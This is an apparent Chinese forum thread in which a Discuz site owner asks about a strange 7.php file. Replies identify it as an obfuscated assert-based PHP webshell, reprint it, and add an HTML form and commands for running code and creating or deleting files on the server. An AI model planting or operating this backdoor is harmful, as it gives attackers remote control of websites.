Home  >  Article  >  Backend Development  >  discuz 里面有这段代码

discuz 里面有这段代码

WBOY
WBOYOriginal
2016-06-23 13:32:32942browse

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

请问这是什么意思?
我的网站被主机屋封了,然后他们叫我删掉游戏登录器,我不太懂,就看了下FTP里面,
有这段代码,不会是黑客注入的吧?


回复讨论(解决方案)

有一个名为7.php的文件,我从来没见过的,然后里面有这段代码

是木马,利用assert来执行php函数的。

7.php

<?php                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>


然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head>  <title> New Document </title> </head> <body>  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php">  <textarea name="-7" style="width:500px; height:300px"></textarea>    <input type="submit" value="submit"></form> </body></html>


然后运行shell.html,
1.在textarea中输入 phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入 file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入 unlink('xxxxx'); 后提交,就能删除xxx文件。

谢谢楼上的解答,我已经删了,就是想知道为什么

是木马,利用assert来执行php函数的。

7.php

<?php                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>


然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head>  <title> New Document </title> </head> <body>  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php">  <textarea name="-7" style="width:500px; height:300px"></textarea>    <input type="submit" value="submit"></form> </body></html>


然后运行shell.html,
1.在textarea中输入 phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入 file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入 unlink('xxxxx'); 后提交,就能删除xxx文件。



大神我结贴了,顺便问一下有没有方法防范这种攻击?

都让人留后门了,还能防范吗?

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn